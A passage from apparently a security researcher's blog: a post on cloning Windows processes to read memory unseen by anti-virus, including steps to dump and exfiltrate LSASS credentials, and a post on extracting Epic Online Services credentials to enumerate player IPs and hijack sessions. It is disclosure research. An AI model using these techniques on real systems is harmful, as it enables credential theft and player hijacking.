For example, a normal process running under a standard user can open a SYSTEM process for querying basic information, but it cannot open that process with a privileged access right such as <code>PROCESS_VM_READ</code>.</p><p>In the real world, the importance of process access rights can be seen in the restrictions anti-virus and anti-cheat products place on certain processes. An anti-virus might <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-obregistercallbacks">register a process handle create callback</a> to prevent processes from opening the Local Security Authority Subsystem Service (LSASS), which could contain sensitive credentials in its memory. An anti-cheat might prevent processes from opening the game they are protecting, because cheaters can access key regions of the game memory to gain an unfair advantage.</p><p>When you look at the thirteen process access rights, do any of them stand out as potentially malicious? I investigated that question by taking a look at the drivers for several anti-virus products. Specifically, what access rights did they filter for in their process handle create callbacks? 
I came up with this subset of access rights that were often directly associated with potentially malicious operations: <code>PROCESS_ALL_ACCESS</code>, <code>PROCESS_CREATE_THREAD</code>, <code>PROCESS_DUP_HANDLE</code>, <code>PROCESS_SET_INFORMATION</code>, <code>PROCESS_SUSPEND_RESUME</code>, <code>PROCESS_TERMINATE</code>, <code>PROCESS_VM_OPERATION</code>, <code>PROCESS_VM_READ</code>, and <code>PROCESS_VM_WRITE</code>.</p><p>This leaves four other access rights that were discovered to be largely ignored:</p><ol><li><code>PROCESS_QUERY_INFORMATION</code> - Required to retrieve general information about a process such as its token, exit code, and priority class.</li><li><code>PROCESS_QUERY_LIMITED_INFORMATION</code> - Required to retrieve certain limited information about a process.</li><li><code>PROCESS_SET_QUOTA</code> - Required to set memory limits using SetProcessWorkingSetSize.</li><li><code>PROCESS_CREATE_PROCESS</code> - Required to create a process.</li></ol><p>These access rights were particularly interesting because if we could find a way to abuse any of them, we could potentially evade the detection of a majority of anti-virus products.</p><p>Most of these remaining rights cannot modify important aspects of a process. <code>PROCESS_QUERY_INFORMATION</code> and <code>PROCESS_QUERY_LIMITED_INFORMATION</code> are purely for reading informational details about a process. <code>PROCESS_SET_QUOTA</code> does impact the process, but does not provide much surface to abuse. For example, being able to set a process&apos;s performance limits provides limited usefulness in an attack.</p><p>What about <code>PROCESS_CREATE_PROCESS</code>? This access right allows a caller to &quot;create a process&quot; using the process handle, but what does that mean?</p><p>In practice, someone with a process handle containing this access right can create processes on behalf of that process. 
In the following sections, we will explore existing techniques that abuse this access right and its undiscovered potential.</p><h2 id="parent-process-spoofing">Parent Process Spoofing</h2><p>An existing evasion technique called &quot;parent process ID spoofing&quot; is used when a malicious application would like to create a child process under a different process. This allows an attacker to create a process while having it appear as if it was launched by another legitimate application.</p><p>At a high-level, common implementations of parent process ID spoofing will:</p><ol><li>Call <a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-initializeprocthreadattributelist">InitializeProcThreadAttributeList</a> to initialize an attribute list for the child process.</li><li>Use <a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess">OpenProcess</a> to obtain a <code>PROCESS_CREATE_PROCESS</code> handle to the fake parent process.</li><li>Update the previously initialized attribute list with the parent process handle using <a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute">UpdateProcThreadAttribute</a>.</li><li>Create the child process with <a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa">CreateProcess</a>, passing extended startup information containing the process attributes.</li></ol><p>This technique provides more usefulness than just being able to spoof the parent process of a child. It can be used to attack the parent process itself as well.</p><p>When creating a process, if the attacker specifies <code>TRUE</code> for the InheritHandles argument, all inheritable handles present in the parent process will be given to the child. 
For example, if a process has an inheritable thread handle and an attacker would like to obtain this handle indirectly, the attacker can abuse parent process spoofing to create their own malicious child process which inherits these handles.</p><p>The malicious child process would then be able to abuse these inherited handles in an attack against the parent process, such as a child using asynchronous procedure calls (APCs) on the parent&apos;s thread handle. Although this variation of the technique does require that the parent have critical handles set to be inheritable; several common applications, such as Firefox and Chrome, have inheritable thread handles.</p><h2 id="ways-to-create-processes">Ways to Create Processes</h2><p>The previous section explored one existing attack that used the high-level kernel32.dll function CreateProcess, but this is not the only way to create a process. Kernel32 provides abstractions such as CreateProcess which allow developers to avoid having to use ntdll functions directly.</p><p>When taking a look under the hood, kernel32 uses ntdll functions and does much of the heavy lifting required to perform NtXx calls. CreateProcess uses NtCreateUserProcess, which has the following function prototype:</p><pre><code class="language-C">NTSTATUS NTAPI
NtCreateUserProcess (
    PHANDLE ProcessHandle,
    PHANDLE ThreadHandle,
    ACCESS_MASK ProcessDesiredAccess,
    ACCESS_MASK ThreadDesiredAccess,
    POBJECT_ATTRIBUTES ProcessObjectAttributes,
    POBJECT_ATTRIBUTES ThreadObjectAttributes,
    ULONG ProcessFlags,
    ULONG ThreadFlags,
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
    PPROCESS_CREATE_INFO CreateInfo,
    PPROCESS_ATTRIBUTE_LIST AttributeList
    );</code></pre><p>NtCreateUserProcess is not the only low-level function exposed to create processes. There are two legacy alternatives: <code>NtCreateProcess</code> and <code>NtCreateProcessEx</code>. Their function prototypes are:</p><pre><code class="language-C">NTSTATUS NTAPI
NtCreateProcess (
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    BOOLEAN InheritObjectTable,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort
    );

NTSTATUS NTAPI
NtCreateProcessEx (
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    ULONG Flags,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort,
    BOOLEAN InJob
    );</code></pre><p>NtCreateProcess and NtCreateProcessEx are quite similar but offer a different route of process creation when compared to NtCreateUserProcess.</p><h2 id="forking-your-own-process">Forking Your Own Process</h2><p>A lesser documented <em>limited</em> technique available to developers is the ability to fork processes on Windows. The undocumented function developers can use to fork their own process is RtlCloneUserProcess. This function does not directly call the kernel and instead is a wrapper around NtCreateUserProcess.</p><p>A minimal implementation of forking through NtCreateUserProcess can be achieved trivially. By calling NtCreateUserProcess with NULL for both object attribute arguments, NULL for the process parameters, an empty (but not NULL) create info argument, and a NULL attribute list; a fork of the current process will be created.</p><p>One question that arose when performing this research was: What is the difference between forking a process and creating a new process with handles inherited? Interestingly, the minimal forking mechanism present in Windows does not only include inheritable handles, but <em>private memory regions</em> too. Any dynamically allocated pages as part of the parent will be accessible at the same location in the child as well.</p><p>Both <a href="https://gist.github.com/Cr4sh/126d844c28a7fbfd25c6">RtlCloneUserProcess</a> and the <a href="https://github.com/Microwave89/createuserprocess/">minimal implementation</a> described are publicly known techniques for simulating fork on Windows, but is there any use forking provides to an attacker?</p><p>In 2019, Microsoft Research Labs published a paper named &quot;<a href="https://www.microsoft.com/en-us/research/publication/a-fork-in-the-road/">A fork() in the road</a>&quot;, which discussed how what used to be a &quot;clever hack&quot; has &quot;long outlived its usefulness and is now a liability&quot;. 
The paper discusses several areas, such as how fork is a &quot;terrible abstraction&quot; and how it compromises OS implementations. The section titled &quot;FORK IN THE MODERN ERA&quot; is particularly relevant:</p><blockquote><strong>Fork is insecure.</strong> By default, a forked child inherits everything from its parent, and <strong>the programmer is responsible for explicitly removing state that the child does not need</strong> by: closing file descriptors (or marking them as close-on-exec), <strong>scrubbing secrets from memory</strong>, isolating namespaces using unshare() [52], etc. From a security perspective, the inherit by-default behaviour of fork violates the principle of least privilege.</blockquote><p>This section covers the security risk that is posed by the ability to fork processes. Microsoft provides the example that a forked process &quot;inherits everything from its parent&quot; and that &quot;the programmer is responsible for explicitly removing state that the child does not need&quot;. What happens when the programmer is a malicious attacker?</p><h2 id="forking-a-remote-process">Forking a Remote Process</h2><p>I propose a new method of abusing the limited fork functionality present in Windows. Instead of forking your <em>own</em> process, what if you forked a <em>remote</em> process? If an attacker could fork a remote process, they would be able to gain insight into the target process without needing a sensitive process access right such as <code>PROCESS_VM_READ</code>, which could be monitored by anti-virus.</p><p>With only a <code>PROCESS_CREATE_PROCESS</code> handle, an attacker can fork or &quot;duplicate&quot; a process and access any secrets that are present in it. 
When using the legacy NtCreateProcess(Ex) variant, forking a remote process is relatively simple.</p><p>By passing NULL for the SectionHandle and a <code>PROCESS_CREATE_PROCESS</code> handle of the target for the ParentProcess arguments, a fork of the remote process will be created and an attacker will receive a handle to the forked process. Additionally, as long as the attacker does not create any threads, <em>no process creation callbacks will fire</em>. This means that an attacker could read the sensitive memory of the target and anti-virus wouldn&apos;t even know that the child process had been created.</p><p>When using the modern NtCreateUserProcess variant, all an attacker needs to do is use the previous minimal implementation of forking your own process but pass the target process handle as a PsAttributeParentProcess in the attribute list.</p><p>With the child handle, an attacker could read sensitive memory from the target application for a variety of purposes. In the following sections, we&apos;ll cover approaches to detection and an example of how an attacker could abuse this in a real attack.</p><h2 id="example-anti-virus-tampering">Example: Anti-Virus Tampering</h2><p>Some commercial anti-virus solutions may include self-integrity features designed to combat tampering and information disclosure. If an attacker could access the memory of the anti-virus process, it is possible that sensitive information about the system or the anti-virus itself could be abused.</p><p>With Process Forking, an attacker can gain access to both private memory and inheritable handles with only a <code>PROCESS_CREATE_PROCESS</code> handle to the victim process. A few examples of attacks include:</p><ol><li>An attacker could read the encryption keys that are used to communicate with a trusted anti-virus server to decrypt or potentially tamper with this line of communication. 
For example, an attacker could pose as a man-in-the-middle (MiTM) with these encryption keys to prevent the anti-virus client from communicating alerts or spoof server responses to further tamper with the client.</li><li>An attacker could gain access to sensitive information about the system that was provided by the kernel. This information could include data from kernel callbacks that an attacker otherwise would not have access to from usermode.</li><li>An attacker could gain access to any handle the anti-virus process holds that is marked as inheritable. For example, if the anti-virus protects certain files from being accessed, such as sensitive configuration files, an attacker may be able to inherit a handle opened by the anti-virus process itself to access that protected file.</li></ol><h2 id="example-credential-dumping">Example: Credential Dumping</h2><p>One obvious target for a stealthy memory reading technique such as this is the Local Security Authority Subsystem Service (LSASS). LSASS is often the target of attackers that wish to capture the credentials for the current machine.</p><p>In a typical attack, a malicious program such as <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz</a> directly interfaces with LSASS on the victim machine, however, a stealthier alternative has been to dump the memory of LSASS for processing on an attacker machine. 
This is to avoid putting a well-known malicious program such as Mimikatz on the victim environment which is much more likely to be detected.</p><p>With Process Forking, an attacker can evade defensive solutions that monitor or prevent access to the LSASS process by dumping the memory of an LSASS fork instead:</p><ol><li>Set debug privileges for your current process if you are not already running as SYSTEM.</li><li>Open a file to write the memory dump to.</li><li>Create a fork child of LSASS.</li><li>Use the common <a href="https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump">MiniDumpWriteDump</a> API on the forked child.</li><li>Exfiltrate the dump file to an attacker machine for further processing.</li></ol><h2 id="proof-of-concept">Proof of Concept</h2><p>A simple proof-of-concept utility and library have been <a href="https://github.com/D4stiny/ForkPlayground">published on GitHub</a>.</p><h2 id="conclusion">Conclusion</h2><p>Process Forking still requires that an attacker would have access to the victim process in the default Windows security model. Process Forking does not break integrity boundaries and attackers are restricted to processes running at the same privilege level they are. What Process Forking does offer is a largely ignored alternative to handle rights that are known to be potentially malicious.</p><p>Remediation may be difficult depending on the context of the solution relying on handle callbacks. An anti-cheat defending a single process may be able to get away with stripping <code>PROCESS_CREATE_PROCESS</code> handles entirely, but anti-virus solutions protecting multiple processes attempting a similar fix could face compatibility issues. 
It is recommended that vendors who opt to strip this access right initially audit its usage within customer environments and limit the processes they protect as much as possible.</p><h2 id="didnt-i-see-this-on-twitter-yesterday">Didn&apos;t I see this on Twitter yesterday?</h2><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Did you know that it is possible to read memory using a PROCESS_CREATE_PROCESS handle? Just call NtCreateProcessEx to clone the target process (and its entire address space), and then read anything you want from there.&#x1F60E;</p>&#x2014; diversenok (@diversenok_zero) <a href="https://twitter.com/diversenok_zero/status/1463844989612568581?ref_src=twsrc%5Etfw">November 25, 2021</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><p>Yesterday morning, I saw this interesting tweet from <a href="https://twitter.com/diversenok_zero">@diversenok_zero</a> explaining the same method discussed in this blog post.</p><p>One approach I like to take with new research or methods I find that I haven&apos;t investigated thoroughly yet is to generate a SHA256 hash of the idea and then post it somewhere publicly where the timestamp is recorded. This way, in cases like this where my research conflicts with what another researcher was working on, I can always prove I discovered the trick on a certain date. In this case, on June 19th 2021, I posted a <a href="https://gist.github.com/D4stiny/31c0523b5bb824085ceb809ed214f193/revisions">public GitHub gist</a> of the following SHA256 hash:</p><pre><code>D779D38405E8828F5CB27C2C3D75867C6A9AA30E0BD003FECF0401BFA6F9C8C7</code></pre><blockquote>You can read the memory of any process that you can open a PROCESS_CREATE_PROCESS handle to by calling NtCreateProcessEx using the process handle as the ParentHandle argument and providing NULL for the section argument.</blockquote><p>If you generate a SHA256 hash of the quote above, you&apos;ll notice it matches the one I publicly posted back in June.</p><p>I have been waiting to publish this research because I am currently in the process of responsibly disclosing the issue to vendors whose products are impacted by this attack. Since the core theory of my research was shared publicly by @diversenok_zero, I decided it would be alright to share what I found around the technique as well.</p>]]></content:encoded></item><item><title><![CDATA[Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service]]></title><description><![CDATA[<p><em>The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer. All research was conducted independently.</em></p><p>As someone who enjoys games that involve logistics, a recently-released game caught my eye. 
That game was <a href="https://store.steampowered.com/app/526870/Satisfactory/">Satisfactory</a>, which is all about building</p>]]></description><link>https://billdemirkapi.me/insecure-by-design-epic-games-p2p-multiplayer-services/</link><guid isPermaLink="false">602771fbd8acfdb32a8770bd</guid><category><![CDATA[Insecure by Design]]></category><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Thu, 17 Dec 2020 16:07:00 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2021/02/epic-online-services.png" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2021/02/epic-online-services.png" alt="Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service"><p><em>The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer. All research was conducted independently.</em></p><p>As someone who enjoys games that involve logistics, a recently-released game caught my eye. That game was <a href="https://store.steampowered.com/app/526870/Satisfactory/">Satisfactory</a>, which is all about building up a massive factory on an alien planet from nothing. Since I loved my time with <a href="https://store.steampowered.com/app/427520/Factorio/">Factorio</a>, another logistics-oriented game, Satisfactory seemed like a perfect fit!</p><p>Satisfactory had a unique feature that I rarely see in games today, peer-to-peer multiplayer sessions! Generally speaking, most games take the client-server approach of having dedicated servers serving multiple clients instead of the peer-to-peer model where clients serve each other.</p><p>I was curious to see how it worked under the hood. As a security researcher, one of my number one priorities is to always &quot;stay curious&quot; with anything I interact with. 
This was a perfect opportunity to exercise that curiosity!</p><h2 id="introduction">Introduction</h2><p>When analyzing the communication of any application, a great place to start is to attempt to intercept the HTTP traffic. Oftentimes, applications won&apos;t use an overly complicated protocol if they don&apos;t need to, and web requests happen to be one of the most common ways of communicating. To intercept both plaintext and encrypted traffic, I used <a href="https://www.telerik.com/download/fiddler">Fiddler by Telerik</a>, which features a simple-to-use interface for intercepting HTTP(S) traffic. Fiddler took care of installing the root certificate it would use to issue certificates for websites automatically, but the question was whether Satisfactory used a platform that had certificate pinning. Only one way to find out!</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/F2TGVfl.png" class="kg-image" alt="Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service" loading="lazy"></figure><p>Lucky for us, the game did not have any certificate pinning mechanism. The first two requests appeared to query the latest game news from <a href="https://www.coffeestainstudios.com/">Coffee Stain Games</a>, the creators of Satisfactory. I was sad to see that these requests were performed over HTTP, but fortunately they did not contain sensitive information.</p><p>Taking a look at the other requests revealed that Satisfactory was authenticating with Epic Games. Perhaps they were using an Epic Games service for their multiplayer platform?</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/I9o5rJO.png" class="kg-image" alt="Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service" loading="lazy"></figure><p>In the first request to Epic Games&apos; API servers, there are a few interesting headers that indicate what service this could be in connection to. 
Specifically, the User-Agent and Miscellaneous headers referred to something called &quot;EOS&quot;. A quick Google search revealed that this stood for Epic Online Services!</p><h2 id="discovery">Discovery</h2><p><a href="https://dev.epicgames.com/en-US/services">Epic Online Services</a> is intended to assist game developers in creating multiplayer-compatible games by offering a platform that supports many common multiplayer features. Whether it be matchmaking, lobbies, or peer-to-peer functionality, there are many attractive features the service offers to game developers.</p><p>Before we continue with any security review, it&apos;s important to have a basic conceptual understanding of the product you&apos;re reviewing. This context can be especially helpful in later stages when trying to understand the inner workings of the product.</p><p>First, let&apos;s take a look at how you authenticate with the Epic Online Services API (EOS-API). According to <a href="https://dev.epicgames.com/docs/services/en-US/DevPortal/ClientCredentials/index.html">documentation</a>, the EOS Client uses OAuth Client Credentials to authenticate with the EOS-API. Assuming you have already set up a project in the EOS Developer Portal, you can generate credentials for either the <code>GameServer</code> or <code>GameClient</code> role, which are expected to be hardcoded into the server/client binary:</p><blockquote>The EOS SDK requires a program to provide valid Client Credentials, including a Client ID and Client Secret. This information is passed in the EOS_Platform_ClientCredentials structure, which is a parameter in the function EOS_Platform_Create. This enables the SDK to recognize the program as a valid EOS Client, authorize the Client with EOS, and grant access to the features enabled in the corresponding Client Role.</blockquote><p>I found it peculiar that the only &quot;client roles&quot; that existed were <code>GameServer</code> and <code>GameClient</code>. 
The <code>GameClient</code> role &quot;can access EOS information, but typically can&apos;t modify it&quot;, whereas the <code>GameServer</code> role &quot;is a server or secure backend intended for administrative purposes&quot;. If you&apos;re writing a peer-to-peer game, what role do you give clients?</p><p><code>GameClient</code> credentials won&apos;t work for hosting sessions, given that the role is meant for read-only access, but <code>GameServer</code> credentials are only meant for &quot;a server or secure backend&quot;. A peer-to-peer client is neither a server nor anything I&apos;d call &quot;secure&quot;, but Epic Games effectively forces developers to embed <code>GameServer</code> credentials, because otherwise how can peer-to-peer clients host sessions?</p><p>The real danger here is that the documentation falsely assumes that if a client has the <code>GameServer</code> role, it should be trusted, when in fact the client may be an untrusted P2P client. I was amused by the fact that Epic Games even gives an example of the problem with giving untrusted clients the <code>GameServer</code> role:</p><blockquote>The Client is a server or secure backend intended for administrative purposes. This type of Client can directly modify information on the EOS backend. <em>For example, an EOS Client with a role of GameServer could unlock Achievements for a player.</em></blockquote><p>Going back to those requests we intercepted earlier, the client credentials are pretty easy to extract.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/weJYaBj.png" class="kg-image" alt="Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service" loading="lazy"></figure><p>In the authentication request above, the client credentials are simply embedded as a Base64-encoded string in the Authorization header. Decoding this string provides a <code>username:password</code> combination, which represents the client credentials. 
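</p><p>As a quick illustration (the credential pair below is a made-up placeholder, not Satisfactory&apos;s real secret), the encoding step performed by the game and the decoding step performed by an interceptor look like this:</p><pre><code class="language-python">import base64

# Hypothetical placeholder credentials; a real client embeds its own pair.
credentials = "exampleClientId:exampleClientSecret"

# What the game sends: the pair, Base64-encoded, in the Authorization header.
auth_header = "Basic " + base64.b64encode(credentials.encode()).decode()

# What an interceptor does: strip the scheme and decode the remainder.
client_id, client_secret = (
    base64.b64decode(auth_header.split(" ", 1)[1]).decode().split(":", 1)
)
print(client_id, client_secret)</code></pre><p>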
With so little effort, we are able to obtain credentials for the <code>GameServer</code> role, granting significant access to the backend used for Satisfactory. We&apos;ll take a look at what we can do with <code>GameServer</code> credentials in a later section.</p><p>Since we&apos;re interested in peer-to-peer sessions/matchmaking, the next place to look is the &quot;<a href="https://dev.epicgames.com/docs/services/en-US/Interfaces/Sessions/index.html">Sessions interface</a>&quot;, which &quot;gives players the ability to host, find, and interact with online gaming sessions&quot;. This Sessions interface can be obtained through the Platform interface function <code>EOS_Platform_GetSessionsInterface</code>. The high-value targets here are session creation, session discovery, and joining a session. Problems in these processes could have significant security impact.</p><h3 id="discovery-session-creation">Discovery: Session Creation</h3><p>The first process to look at is session creation. Creating a session with the Sessions interface is relatively simple.</p><p>First, you create an <code>EOS_Sessions_CreateSessionModificationOptions</code> structure that contains the following information:</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/KjhgJXn.png" class="kg-image" alt="Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service" loading="lazy"></figure><p>Finally, you need to pass this structure to the <code>EOS_Sessions_CreateSessionModification</code> function to create the session. Although this function will end up creating your session, there is a significant amount you can configure about a session, given that the initial structure passed only contains the information required to create a barebones session.</p><h3 id="discovery-finding-sessions">Discovery: Finding Sessions</h3><p>For example, let&apos;s talk about how matchmaking works with these sessions. 
A major component of Sessions is the ability to add &quot;custom attributes&quot;:</p><blockquote>Sessions can contain user-defined data, called <strong>attributes</strong>. Each attribute has a name, which acts as a string key, a value, an enumerated variable identifying the value&apos;s type, and a visibility setting.</blockquote><p>These &quot;attributes&quot; are what allow developers to add custom information about a session, such as the map the session is for or what version the host is running.</p><p>EOS makes session searching simple. Similar to session creation, to create a barebones &quot;session search&quot;, you simply call <code>EOS_Sessions_CreateSessionSearch</code> with an <code>EOS_Sessions_CreateSessionSearchOptions</code> structure. This structure has the minimum amount of information needed to perform a search, containing only the maximum number of search results to return.</p><p>Before performing a search, you can update the session search object to filter for specific properties. EOS allows you to search for sessions based on:</p><ul><li>A known unique session identifier (at least 16 characters in length).</li><li>A known unique user identifier.</li><li>Session Attributes.</li></ul><p>Although you can use a session identifier or a user identifier if you&apos;re joining a known specific session, for matchmaking purposes, attributes are the <strong>only</strong> way to &quot;discover&quot; sessions based on user-defined data.</p><h3 id="discovery-sensitive-information-disclosure">Discovery: Sensitive Information Disclosure</h3><p>Satisfactory isn&apos;t a matchmaking game, so you&apos;d assume they&apos;d use the unique session identifier provided by the EOS-API. Unfortunately, until a month ago, EOS did not allow you to set a custom session identifier. 
Instead, they forced game developers to use their randomly generated 32-character session ID.</p><p>When hosting a session in Satisfactory, hosts are given the option to set a custom session identifier. When joining a multiplayer session, besides joining via a friend, Satisfactory gives the option of using this session identifier to join sessions. How does this work in the background?</p><p>Although the EOS-API assigns a random session identifier to every newly created session, many implementations ignore it and choose to use attributes to store a session identifier. Let&apos;s be honest, who wants to share a random 32-character string with friends?</p><p>I decided the best way to figure out how Satisfactory handled unique session identifiers was to see what happens on the network when I attempt to join a custom session ID.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/ZNLSfiq.png" class="kg-image" alt="Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service" loading="lazy"></figure><p>Here is the request performed when I attempted to join a session with the identifier &quot;test123&quot;:</p><pre><code class="language-http">POST https://api.epicgames.dev/matchmaking/v1/[deployment id]/filter HTTP/1.1
Host: api.epicgames.dev
...headers removed...

{
  &quot;criteria&quot;: [
    {
      &quot;key&quot;: &quot;attributes.NUMPUBLICCONNECTIONS_l&quot;,
      &quot;op&quot;: &quot;GREATER_THAN_OR_EQUAL&quot;,
      &quot;value&quot;: 1
    },
    {
      &quot;key&quot;: &quot;bucket&quot;,
      &quot;op&quot;: &quot;EQUAL&quot;,
      &quot;value&quot;: &quot;Satisfactory_1.0.0&quot;
    },
    {
      &quot;key&quot;: &quot;attributes.FOSS=SES_CSS_SESSIONID_s&quot;,
      &quot;op&quot;: &quot;EQUAL&quot;,
      &quot;value&quot;: &quot;test123&quot;
    }
  ],
  &quot;maxResults&quot;: 2
}
</code></pre><p>Of course, this returned no valid sessions, but this request interestingly revealed that the mechanism used for finding sessions was based on a set of criteria. I was curious: how much flexibility did the EOS-API give the client when it came to these criteria?</p><h3 id="exploitation-sensitive-information-disclosure">Exploitation: Sensitive Information Disclosure</h3><p>The first idea I had when I saw that filtering was based on an array of &quot;criteria&quot; was to see what happens when you specify <strong>no criteria</strong>. To my surprise, the EOS-API was quite accommodating:</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/RPim6jd.png" class="kg-image" alt="Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service" loading="lazy"></figure><p>Although sessions in Satisfactory are advertised to be &quot;Friends-Only&quot;, I was able to enumerate all sessions that weren&apos;t set to &quot;Private&quot;. Along with each session, I was given the IP Address of the host and their user identifier. On a large-scale basis, an attacker could easily use this information to create a map of most players.</p><p>To be clear, this isn&apos;t just a Satisfactory issue. You can enumerate the sessions of any game you have at least <code>GameClient</code> credentials for. Obviously, in a peer-to-peer model, other players have the potential to learn your IP Address, but the problem here is that it is very simple to enumerate the thousands of active sessions, given that besides the initial authentication, there are literally no access controls (not even rate-limiting). 
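</p><p>Reconstructing that enumeration request takes only a few lines. Here is a hedged sketch (the deployment ID and the <code>maxResults</code> value are placeholders, and the request is only built here, not sent):</p><pre><code class="language-python">import json

# Placeholders; a real query needs the game's deployment ID and an EOS token.
deployment_id = "DEPLOYMENT_ID"
url = "https://api.epicgames.dev/matchmaking/v1/" + deployment_id + "/filter"

# The same filter request as before, but with every criterion removed.
payload = json.dumps({"criteria": [], "maxResults": 200})
print(url)
print(payload)</code></pre><p>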
Furthermore, to connect to another client through the EOS-API, you don&apos;t even need to have the IP Address of the host!</p><h3 id="discovery-session-hijacking">Discovery: Session Hijacking</h3><p>Going back to what we&apos;re really interested in, the peer-to-peer functionality of EOS, I was curious to learn what connecting to other clients actually looks like and what problems might exist with its design. Reading the &quot;<a href="https://dev.epicgames.com/docs/services/en-US/Interfaces/P2P/#sendingandreceivingdatathroughp2pconnections">Sending and Receiving Data Through P2P Connections</a>&quot; section of the NAT P2P Interface documentation reveals that to connect to another player, we need their:</p><ol><li>Product user ID - This &quot;identifies player data for an EOS user within the scope of a single product&quot;.</li><li>Optional socket ID - This is a unique identifier for the specific socket to connect to. In common implementations of EOS, this is typically the randomly generated 32 character &quot;session identifier&quot;.</li></ol><p>Now that we know what data we need, the next step is understanding how the game itself shares these details between players.</p><p>One of the key features of the EOS Matchmaking/Session API we took a look at in a previous section is the existence of &quot;Attributes&quot;, described by documentation to be a critical part of session discovery:</p><blockquote>The most robust way to find sessions is to search based on a set of search parameters, which act as filters. Some parameters could be exposed to the user, such as enabling the user to select a certain game type or map, while others might be hidden, such as using the player&apos;s estimated skill level to find matches with appropriate opponents.</blockquote><p>For peer-to-peer sessions, attributes are even more important, because they are the <em>only</em> way of carrying information about a session to other players. 
For a player to join another&apos;s peer-to-peer session, they need to retrieve the host&apos;s product user ID and an optional socket ID. Most implementations of Epic Online Services store this product user ID in the session&apos;s attributes. Of course, only clients with the <code>GameServer</code> role are allowed to create sessions and/or modify their attributes.</p><h3 id="exploitation-session-hijacking">Exploitation: Session Hijacking</h3><p>Recalling the first section, the core vulnerability and fundamental design flaw with EOS is that P2P games are required to embed <code>GameServer</code> credentials into their application. This means that, theoretically speaking, an attacker can create a fake session with any attribute values they&apos;d like. This got me thinking: if attributes are the primary way clients find sessions to join, then with <code>GameServer</code> credentials we can effectively &quot;duplicate&quot; existing sessions and potentially hijack the session clients find when searching for the original session.</p><p>Sound confusing? It is! Let&apos;s talk through a real-world example.</p><p>One widely used implementation of Epic Online Services is the &quot;OnlineSubsystemEOS&quot; (EOS-OSS) included with the Unreal Engine. This plugin is used by many games, including Satisfactory.</p><p>In Satisfactory&apos;s use of EOS-OSS, they use an attribute named <code>SES_CSS_SESSIONID</code> to track sessions. For example, if a player wanted their friend to join directly, they could give their friend a session ID from their client, which the friend would be able to use to join. When the session ID search is executed, all that&apos;s happening is a filter query against all sessions for that session ID attribute value. 
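</p><p>Conceptually, the duplication step amounts to registering many sessions that carry the victim&apos;s searchable session ID but the attacker&apos;s own hosting details. A hedged sketch of those payloads (the <code>OWNER</code> attribute name is a placeholder for whatever owner-identifying attribute the game stores; nothing is actually registered here):</p><pre><code class="language-python"># Hypothetical sketch of the session payloads an attacker holding
# GameServer credentials could register; all values are placeholders.
victim_session_id = "test123"

duplicates = [
    {
        "bucket": "Satisfactory_1.0.0",
        "attributes": {
            # The searchable ID that victims will filter on.
            "SES_CSS_SESSIONID_s": victim_session_id,
            # Placeholder owner attribute, pointed at the attacker instead.
            "OWNER": "attacker-product-user-id",
        },
    }
    for _ in range(10)
]
print(len(duplicates))</code></pre><p>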
Once the session has been found, EOS-OSS joins the session by retrieving the required product user ID of the host through another session attribute named <code>OWNINGPRODUCTID</code>.</p><p>Since Satisfactory is a peer-to-peer game exclusively using the Epic Online Services API, an attacker can use the credentials embedded in the binary to get access to the <code>GameServer</code> role. With a <code>GameServer</code> token, an attacker can hijack existing sessions by creating several &quot;duplicate&quot; sessions that have the same session ID attribute but <em>have the <code>OWNINGPRODUCTID</code> attribute set to their own product user ID</em>.</p><p>When a victim executes a search for the session with the right session ID, more likely than not, the query will return one of the duplicated sessions that has the attacker&apos;s product user ID (ordering of sessions is random). Thus, when the victim attempts to join the game, they will join the attacker&apos;s game instead!</p><!--kg-card-begin: html--><iframe width="560" height="315" src="https://www.youtube.com/embed/NCjuNnqin9Y" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><!--kg-card-end: html--><p>This attack is more severe than it may seem, because it is trivial to script the attack to hijack all sessions at once and cause all players joining <em>any</em> session to join the attacker&apos;s session instead. To summarize, this fundamental design flaw allows attackers to:</p><ol><li>Hijack <em>any or all</em> &quot;matchmaking sessions&quot; and have any player that joins a session join an attacker&apos;s session instead.</li><li>Prevent players from joining any &quot;matchmaking session&quot;.</li></ol><h2 id="remediation">Remediation</h2><p>When it comes to communication, Epic Games was 